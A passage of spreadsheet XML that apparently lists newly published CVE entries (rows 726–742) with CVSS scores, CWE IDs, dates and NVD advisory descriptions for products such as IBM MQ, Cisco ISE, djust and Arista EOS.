      </c>
      <c r="P726" s="5" t="inlineStr"/>
      <c r="Q726" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R726" s="5" t="inlineStr">
        <is>
          <t>IBM Business Automation Workflow containers and traditional may use programming model artifacts that are vulnerable to XML Entity Injection attacks by default.</t>
        </is>
      </c>
      <c r="S726" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13107</t>
        </is>
      </c>
    </row>
    <row r="727">
      <c r="A727" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B727" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C727" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13275</t>
        </is>
      </c>
      <c r="D727" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E727" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F727" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G727" s="5" t="inlineStr"/>
      <c r="H727" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I727" s="5" t="inlineStr"/>
      <c r="J727" s="5" t="inlineStr"/>
      <c r="K727" s="5" t="inlineStr"/>
      <c r="L727" s="5" t="inlineStr"/>
      <c r="M727" s="5" t="inlineStr"/>
      <c r="N727" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O727" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P727" s="5" t="inlineStr"/>
      <c r="Q727" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R727" s="5" t="inlineStr">
        <is>
          <t>IBM MQ 9.1.0.0 through 9.1.0.37 LTS, 9.2.0.0 through 9.2.0.43 LTS, 9.3.0.0 through 9.3.0.41 LTS, 9.3.0.0 through 9.3.5.1 CD, 9.4.0.0 through 9.4.0.25 LTS, 9.4.0.0 through 9.4.5.1 CD, and 10.0.0.0 Managed File Transfer could allow an authenticated attacker to read arbitrary files or perform server-side request forgery due to XML external entity injection in reply message processing.</t>
        </is>
      </c>
      <c r="S727" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13275</t>
        </is>
      </c>
    </row>
    <row r="728">
      <c r="A728" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B728" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C728" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13285</t>
        </is>
      </c>
      <c r="D728" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E728" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F728" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G728" s="5" t="inlineStr"/>
      <c r="H728" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I728" s="5" t="inlineStr"/>
      <c r="J728" s="5" t="inlineStr"/>
      <c r="K728" s="5" t="inlineStr"/>
      <c r="L728" s="5" t="inlineStr"/>
      <c r="M728" s="5" t="inlineStr"/>
      <c r="N728" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O728" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P728" s="5" t="inlineStr"/>
      <c r="Q728" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R728" s="5" t="inlineStr">
        <is>
          <t>IBM MQ 9.1.0.0 through 9.1.0.37 LTS, 9.2.0.0 through 9.2.0.43 LTS, 9.3.0.0 through 9.3.0.41 LTS, 9.3.0.0 through 9.3.5.1 CD, 9.4.0.0 through 9.4.0.25 LTS, 9.4.0.0 through 9.4.5.1 CD, and 10.0.0.0 is vulnerable to an XML external entity injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources.</t>
        </is>
      </c>
      <c r="S728" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13285</t>
        </is>
      </c>
    </row>
    <row r="729">
      <c r="A729" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B729" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C729" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13287</t>
        </is>
      </c>
      <c r="D729" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E729" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F729" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G729" s="5" t="inlineStr"/>
      <c r="H729" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I729" s="5" t="inlineStr"/>
      <c r="J729" s="5" t="inlineStr"/>
      <c r="K729" s="5" t="inlineStr"/>
      <c r="L729" s="5" t="inlineStr"/>
      <c r="M729" s="5" t="inlineStr"/>
      <c r="N729" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O729" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P729" s="5" t="inlineStr"/>
      <c r="Q729" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R729" s="5" t="inlineStr">
        <is>
          <t>IBM MQ 9.1.0.0 through 9.1.0.37 LTS, 9.2.0.0 through 9.2.0.43 LTS, 9.3.0.0 through 9.3.0.41 LTS, 9.3.0.0 through 9.3.5.1 CD, 9.4.0.0 through 9.4.0.25 LTS, 9.4.0.0 through 9.4.5.1 CD, and 10.0.0.0 is vulnerable to an XML external entity injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources.</t>
        </is>
      </c>
      <c r="S729" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13287</t>
        </is>
      </c>
    </row>
    <row r="730">
      <c r="A730" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B730" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C730" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19248</t>
        </is>
      </c>
      <c r="D730" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E730" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F730" s="5" t="inlineStr">
        <is>
          <t>a59d8014-47c4-4630-ab43-e1b13cbe58e3</t>
        </is>
      </c>
      <c r="G730" s="5" t="inlineStr"/>
      <c r="H730" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I730" s="5" t="inlineStr"/>
      <c r="J730" s="5" t="inlineStr"/>
      <c r="K730" s="5" t="inlineStr"/>
      <c r="L730" s="5" t="inlineStr"/>
      <c r="M730" s="5" t="inlineStr"/>
      <c r="N730" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O730" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P730" s="5" t="inlineStr"/>
      <c r="Q730" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="R730" s="5" t="inlineStr">
        <is>
          <t>QDomDocument XML parsing is vulnerable to a remotely-triggerable denial-of-service crash when processing untrusted input.</t>
        </is>
      </c>
      <c r="S730" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19248</t>
        </is>
      </c>
    </row>
    <row r="731">
      <c r="A731" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B731" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C731" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20300</t>
        </is>
      </c>
      <c r="D731" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E731" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F731" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G731" s="5" t="inlineStr"/>
      <c r="H731" s="5" t="inlineStr"/>
      <c r="I731" s="5" t="inlineStr"/>
      <c r="J731" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K731" s="5" t="inlineStr"/>
      <c r="L731" s="5" t="inlineStr"/>
      <c r="M731" s="5" t="inlineStr"/>
      <c r="N731" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O731" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P731" s="5" t="inlineStr"/>
      <c r="Q731" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R731" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco ISE could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected device. To exploit this vulnerability, the attacker must have at least low-privileged administrative credentials.
This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to read or modify data in the underlying database.</t>
        </is>
      </c>
      <c r="S731" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20300</t>
        </is>
      </c>
    </row>
    <row r="732">
      <c r="A732" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B732" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C732" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20683</t>
        </is>
      </c>
      <c r="D732" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E732" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F732" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G732" s="5" t="inlineStr"/>
      <c r="H732" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I732" s="5" t="inlineStr"/>
      <c r="J732" s="5" t="inlineStr"/>
      <c r="K732" s="5" t="inlineStr"/>
      <c r="L732" s="5" t="inlineStr"/>
      <c r="M732" s="5" t="inlineStr"/>
      <c r="N732" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O732" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P732" s="5" t="inlineStr"/>
      <c r="Q732" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R732" s="5" t="inlineStr">
        <is>
          <t>An authentication issue was addressed with improved state management. This issue is fixed in iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, visionOS 27. An app may be able to use the Sign In With Apple authentication flow to access the user's Apple Account.</t>
        </is>
      </c>
      <c r="S732" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20683</t>
        </is>
      </c>
    </row>
    <row r="733">
      <c r="A733" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B733" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C733" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40856</t>
        </is>
      </c>
      <c r="D733" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E733" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F733" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G733" s="5" t="inlineStr"/>
      <c r="H733" s="5" t="inlineStr"/>
      <c r="I733" s="5" t="inlineStr"/>
      <c r="J733" s="5" t="inlineStr"/>
      <c r="K733" s="5" t="inlineStr"/>
      <c r="L733" s="5" t="inlineStr"/>
      <c r="M733" s="5" t="inlineStr"/>
      <c r="N733" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O733" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P733" s="5" t="inlineStr"/>
      <c r="Q733" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R733" s="5" t="inlineStr">
        <is>
          <t>WNC T-Mobile 5G Box IDU router is vulnerable to improper access control. The vulnerability exists in the wnc_maccheck.cgi endpoint, which is accessible without authentication. It allows a remote attacker to retrieve sensitive configuration data, including the administrator web password, WiFi passphrase, and technical device information.This issue has been fixed in firmware version 1.1.0.651412</t>
        </is>
      </c>
      <c r="S733" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40856</t>
        </is>
      </c>
    </row>
    <row r="734">
      <c r="A734" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B734" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C734" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61596</t>
        </is>
      </c>
      <c r="D734" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E734" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F734" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G734" s="5" t="inlineStr"/>
      <c r="H734" s="5" t="inlineStr"/>
      <c r="I734" s="5" t="inlineStr"/>
      <c r="J734" s="5" t="inlineStr"/>
      <c r="K734" s="5" t="inlineStr"/>
      <c r="L734" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M734" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N734" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O734" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P734" s="5" t="inlineStr"/>
      <c r="Q734" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="R734" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, djust's per-object authorization (`get_object` + `has_object_permission`, ADR-017) was enforced on the WebSocket mount and event paths but not on three other render entry points: (a) the initial HTTP GET render, (b) SPA `url_change` navigation, and (c) `{% live_render %}` embedded child views. An authenticated user could therefore view (and on some paths act on) an object they are not authorized for by loading the page directly, navigating to it via SPA url-change, or composing it as an embedded child — a classic IDOR / broken object-level access control on object-scoped views. This is fixed in djust 1.0.7. All render entry points now route through a shared `enforce_object_permission` chokepoint: HTTP GET returns 403, `url_change` emits a `permission_denied` frame and skips the render, and `{% live_render %}` (eager + lazy) refuses the embed. Views without a custom `get_object` are unaffected (no-op). No reliable workaround short of upgrading. Do not expose object-scoped views through the HTTP-GET / url_change / live_render paths until patched.</t>
        </is>
      </c>
      <c r="S734" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61596</t>
        </is>
      </c>
    </row>
    <row r="735">
      <c r="A735" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B735" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C735" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61598</t>
        </is>
      </c>
      <c r="D735" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E735" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F735" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G735" s="5" t="inlineStr"/>
      <c r="H735" s="5" t="inlineStr"/>
      <c r="I735" s="5" t="inlineStr"/>
      <c r="J735" s="5" t="inlineStr"/>
      <c r="K735" s="5" t="inlineStr"/>
      <c r="L735" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M735" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N735" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O735" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P735" s="5" t="inlineStr"/>
      <c r="Q735" s="5" t="inlineStr">
        <is>
          <t>CWE-915</t>
        </is>
      </c>
      <c r="R735" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, `djust.mixins.model_binding.ModelBindingMixin` provides a default `update_model` event handler and is part of the LiveView base MRO, so every LiveView exposes it. It `setattr`s a view attribute whose name is client-supplied (`field`), gated only by: reject `_`-prefixed names; reject a 14-entry denylist of framework internals (`FORBIDDEN_MODEL_FIELDS`); optional `allowed_model_fields` which defaults to None = allow all; and `hasattr` existence. As a result, a client can set any public, existing view attribute — not just the fields actually bound with `dj-model=` in the rendered template. The denylist covers framework plumbing but nothing about developer business/authz state, and the allowlist is opt-in (off by default). A developer who binds one `dj-model="search"` input and also keeps `self.account_id` / `self.is_admin` / `self.total_price` as view state does not realize a client can set ALL of them via `{type:event, event:"update_model", params:{field, value}}` over the WebSocket. Type coercion matches the target attribute's type (so `"true"` -&gt; bool True), aiding the attacker. This issue is fixed in djust 1.0.7. As a workaround, set `allowed_model_fields` explicitly on every view using dj-model (or subclassing LiveView) to the minimal list of bindable fields; do not keep authorization/ownership state in public view attributes that share the view with dj-model bindings.</t>
        </is>
      </c>
      <c r="S735" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61598</t>
        </is>
      </c>
    </row>
    <row r="736">
      <c r="A736" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B736" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C736" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61915</t>
        </is>
      </c>
      <c r="D736" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E736" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F736" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G736" s="5" t="inlineStr"/>
      <c r="H736" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I736" s="5" t="inlineStr"/>
      <c r="J736" s="5" t="inlineStr"/>
      <c r="K736" s="5" t="inlineStr">
        <is>
          <t>cyrus:imap</t>
        </is>
      </c>
      <c r="L736" s="5" t="inlineStr"/>
      <c r="M736" s="5" t="inlineStr"/>
      <c r="N736" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O736" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P736" s="5" t="inlineStr"/>
      <c r="Q736" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R736" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Cyrus IMAP before 3.12.4. There is a VPATCH BYPARAM double-free. An authenticated calendar user could crash a Cyrus CalDAV worker with a PATCH containing PATCH-ACTION="BYPARAM@..." against a resource with two or more properties of the matched kind. The memory holding the selector would be freed once on each iteration over the properties.</t>
        </is>
      </c>
      <c r="S736" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61915</t>
        </is>
      </c>
    </row>
    <row r="737">
      <c r="A737" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B737" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C737" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66305</t>
        </is>
      </c>
      <c r="D737" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E737" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F737" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G737" s="5" t="inlineStr"/>
      <c r="H737" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I737" s="5" t="inlineStr"/>
      <c r="J737" s="5" t="inlineStr"/>
      <c r="K737" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L737" s="5" t="inlineStr"/>
      <c r="M737" s="5" t="inlineStr"/>
      <c r="N737" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O737" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P737" s="5" t="inlineStr"/>
      <c r="Q737" s="5" t="inlineStr">
        <is>
          <t>CWE-603</t>
        </is>
      </c>
      <c r="R737" s="5" t="inlineStr">
        <is>
          <t>Use of client-side authentication in Skype for Business allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="S737" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66305</t>
        </is>
      </c>
    </row>
    <row r="738">
      <c r="A738" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B738" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C738" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73175</t>
        </is>
      </c>
      <c r="D738" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E738" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F738" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G738" s="5" t="inlineStr"/>
      <c r="H738" s="5" t="inlineStr"/>
      <c r="I738" s="5" t="inlineStr"/>
      <c r="J738" s="5" t="inlineStr"/>
      <c r="K738" s="5" t="inlineStr"/>
      <c r="L738" s="5" t="inlineStr"/>
      <c r="M738" s="5" t="inlineStr"/>
      <c r="N738" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O738" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P738" s="5" t="inlineStr"/>
      <c r="Q738" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R738" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-400: Uncontrolled Resource Consumption vulnerability in the OPC UA gateway component of Advantech EKI-1242EIMS in firmware version V1.06.01 that allows an adjacent unauthenticated attacker to exhaust the server session pool and cause a complete denial of service to all legitimate OPC UA clients by opening multiple anonymous sessions.</t>
        </is>
      </c>
      <c r="S738" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73175</t>
        </is>
      </c>
    </row>
    <row r="739">
      <c r="A739" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B739" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C739" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73462</t>
        </is>
      </c>
      <c r="D739" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E739" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F739" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G739" s="5" t="inlineStr"/>
      <c r="H739" s="5" t="inlineStr"/>
      <c r="I739" s="5" t="inlineStr"/>
      <c r="J739" s="5" t="inlineStr"/>
      <c r="K739" s="5" t="inlineStr"/>
      <c r="L739" s="5" t="inlineStr"/>
      <c r="M739" s="5" t="inlineStr"/>
      <c r="N739" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O739" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P739" s="5" t="inlineStr"/>
      <c r="Q739" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R739" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS with IGMP (Internet Group Management Protocol) snooping configured (enabled by default on all VLANs), a network-adjacent unauthenticated attacker can send malformed network packets on an affected VLAN to cause the IGMP snooping agent to terminate unexpectedly. This results in a temporary disruption of multicast traffic management, which may cause multicast traffic to be flooded to all ports of the affected VLAN until the service recovers. Repeated exploitation could result in a prolonged loss of intended multicast forwarding behavior.</t>
        </is>
      </c>
      <c r="S739" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73462</t>
        </is>
      </c>
    </row>
    <row r="740">
      <c r="A740" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B740" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C740" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73468</t>
        </is>
      </c>
      <c r="D740" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E740" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F740" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G740" s="5" t="inlineStr"/>
      <c r="H740" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I740" s="5" t="inlineStr"/>
      <c r="J740" s="5" t="inlineStr"/>
      <c r="K740" s="5" t="inlineStr"/>
      <c r="L740" s="5" t="inlineStr"/>
      <c r="M740" s="5" t="inlineStr"/>
      <c r="N740" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O740" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P740" s="5" t="inlineStr"/>
      <c r="Q740" s="5" t="inlineStr">
        <is>
          <t>CWE-670</t>
        </is>
      </c>
      <c r="R740" s="5" t="inlineStr">
        <is>
          <t>A specially crafted packet can cause the premature expiry of multicast forwarding state on affected interfaces, potentially resulting in temporary multicast traffic loss during the affected period.</t>
        </is>
      </c>
      <c r="S740" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73468</t>
        </is>
      </c>
    </row>
    <row r="741">
      <c r="A741" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B741" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C741" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80380</t>
        </is>
      </c>
      <c r="D741" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E741" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F741" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G741" s="5" t="inlineStr"/>
      <c r="H741" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I741" s="5" t="inlineStr"/>
      <c r="J741" s="5" t="inlineStr"/>
      <c r="K741" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L741" s="5" t="inlineStr"/>
      <c r="M741" s="5" t="inlineStr"/>
      <c r="N741" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O741" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P741" s="5" t="inlineStr"/>
      <c r="Q741" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R741" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote attacker to perform unauthorized actions due to cross-site request forgery.</t>
        </is>
      </c>
      <c r="S741" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80380</t>
        </is>
      </c>
    </row>
    <row r="742">
      <c r="A742" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B742" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C742" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82052</t>
        </is>
      </c>
      <c r="D742" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E742" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F742" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G742" s="5" t="inlineStr"/>
      <c r="H742" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I742" s="5" t="inlineStr"/>
      <c r="J742" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K742" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L742" s="5" t="inlineStr"/>
      <c r="M742" s="5" t="inlineStr"/>
